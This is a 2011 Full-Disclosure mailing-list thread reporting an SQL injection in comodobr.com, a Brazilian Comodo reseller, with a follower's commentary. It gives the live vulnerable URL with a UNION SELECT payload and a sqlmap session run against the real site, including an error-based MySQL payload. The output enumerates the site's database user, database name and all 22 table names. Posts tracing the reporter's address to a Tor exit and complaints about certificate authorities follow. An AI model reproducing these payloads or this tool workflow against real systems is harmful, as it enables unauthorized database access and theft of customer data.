Received: from [199.48.147.35] by web120908.mail.ne1.yahoo.com via HTTP;
Sun, 22 May 2011 11:20:54 PDT
X-Mailer: YahooMailClassic/14.0.1 YahooMailWebService/0.8.111.303096
Date: Sun, 22 May 2011 11:20:54 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles@ymail.com>
X-Mailman-Approved-At: Sun, 22 May 2011 19:35:39 +0100
Cc: suporte@comodobr.com
Subject: [Full-disclosure] comodobr.com sqli
vulnerable link:
https://www.comodobr.com/comprar/compra_codesigning.php?prod=8 UNION ALL
SELECT 0,1,2,3,4,5,6,7,8,9,10,11,12,13,14 -- -
http://pastebin.com/9qwdL1pA
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/
---------------------------------------------------------------------
PS C:\Python27> nslookup 199.48.147.35
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Name: tor-exit-router35-readme.formlessnetworking.net
Address: 199.48.147.35
>>> You're not going to find him... <<<
>>> Let's check the host: <<<>>><<<>>><
PS C:\Python27> .\python.exe C:\sqlmap-0.9\sqlmap.py --wizard
sqlmap/0.9 - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net
[*] starting at: 21:00:00
Please enter full target URL (-u): https://www.comodobr.com/comprar/compra_codesigning.php?prod=8
POST data (--data) [Enter for None]:
Injection difficulty (--level/--risk). Please choose:
[1] Normal (default)
[2] Medium
[3] Hard
> 1
Enumeration (--banner/--current-user/etc). Please choose:
[1] Basic (default)
[2] Smart
[3] All
> 1
sqlmap is running, please wait..
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: prod
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: prod=8 AND (SELECT 1198 FROM(SELECT COUNT(*),CONCAT(CHAR(58,110,109,109,58),(SELECT (CASE WHEN (1198=1198)
THEN 1 ELSE 0 END)),CHAR(58,114,117,115,58),FLOOR(RAND(0)*2))x FROM information_schema.tables GROUP BY x)a)
---
[21:00:00] [INFO] retrieved: 5.0.91-community-log
web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner: '5.0.91-community-log'
[21:00:00] [INFO] retrieved: comodobr_site@localhost
current user: 'comodobr_site@localhost'
[21:00:00] [INFO] retrieved: comodobr_comodobr
current database: 'comodobr_comodobr'
current user is DBA: 'False'
[*] shutting down at: 21:00:00
PS C:\Python27>
>>> Looks real <<<>>><<<>>><<<>>><<<>>>
>>> Let's see the inside of the db: <<<
web application technology: PHP 5.2.6, Apache 2.0.63
back-end DBMS: MySQL 5.0
banner: '5.0.91-community-log'
current user: 'comodobr_site@localhost'
current database: 'comodobr_comodobr'
current user is DBA: 'False'
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_associa
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_categoria
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_importado
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_boleto_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_confirm_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_contab
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_expected_delivery_time
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_hosting_contas
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_meios_pago
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedido_status_codes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_pedidos_historico
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prod_grupos
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_prods
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_resellers
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_server_software
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_users
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_vw_crm_clientes
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_item
[21:00:00] [INFO] retrieved: comodobr_comodobr
[21:00:00] [INFO] retrieved: comodo_webhostreport_subitem
Database: comodobr_comodobr
[22 tables]
+-------------------------------+
| comodo_boleto |
| comodo_boleto_associa |
| comodo_boleto_categoria |
| comodo_boleto_importado |
| comodo_boleto_status |
| comodo_confirm_pago |
| comodo_contab |
| comodo_expected_delivery_time |
| comodo_hosting_contas |
| comodo_meios_pago |
| comodo_pedido_status |
| comodo_pedido_status_codes |
| comodo_pedidos |
| comodo_pedidos_historico |
| comodo_prod_grupos |
| comodo_prods |
| comodo_resellers |
| comodo_server_software |
| comodo_users |
| comodo_vw_crm_clientes |
| comodo_webhostreport_item |
| comodo_webhostreport_subitem |
+-------------------------------+
[*] shutting down at: 21:00:00
PS C:\Python27>
When are comodo going to fix this? How come comodo is a CA? They shouldn't be trusted! And what about TÜRKTRUST.. Who the HELL are they? I don't trust them, but they are still a CA in my browser.. WHY? When are we going to see private certs from paypal, google, etc? Why does Firefox restore all my CA's, when I delete them in the "Certificate Manager"? Do we *STILL* trust https? What's next?
GET YOUR SHIT TOGETHER.
EDIT: I'm not the "hacker". The "real hacker" is here: http://pastebin.com/u/gimmemyfiles
I've just checked his claims, which was true. Everyone can claim that they hacked comodo, but that the vulnerable was fixed, so all I have done is open sqlmap and tested :-)
Also here's a new response:
Received: from [199.48.147.35] by web120910.mail.ne1.yahoo.com via HTTP;
Tue, 24 May 2011 14:58:39 PDT
X-Mailer: YahooMailWebService/0.8.111.303096
Date: Tue, 24 May 2011 14:58:39 -0700 (PDT)
From: Hgkdfhklj Jdhglkjfdhg <gimmemyfiles AT ymail.com>
Cc: "support@comodobr.com" <support@comodobr.com>
Subject: [Full-disclosure] My comments on comodobr.com
I have to agree with Comodo president and CEO, Melih Abdulhayoglu.
In fact, anyone that can use sqlmap or pangolin and knows how to google for "filetype:php inurl:prod" could have found that sqli.
However the same way the security perimeter of the mainframe _should_ be extended to the desktops connected to it, it might be a good idea for resellers and partners to tighten own their own security. further compromise of comodobr.com systems (_if_possible_) could have been a foothold into Comodo's systems.
Just my 50 cents
[Edit]
The db dump was partial because the only thing omitted from the db dump was request logs. Either way, CSR's and client info shouldn't be "readily available" as this.
No beef with comodobr.com or Comodo, just with companies in the security business that don't take care of their own.
That's one of the reasons we have been trying to make the internet secure for so long. Some people just don't help.
http://pastebin.com/MFSUdCnk
_______________________________________________
Full-Disclosure - We believe in it.
Hosted and sponsored by Secunia - http://secunia.com/
PS C:\Users\Nicolai> nslookup 199.48.147.35
Server: google-public-dns-a.google.com
Address: 8.8.8.8
Name: tor-exit-router35-readme.formlessnetworking.net
Address: 199.48.147.35
PS C:\Users\Nicolai>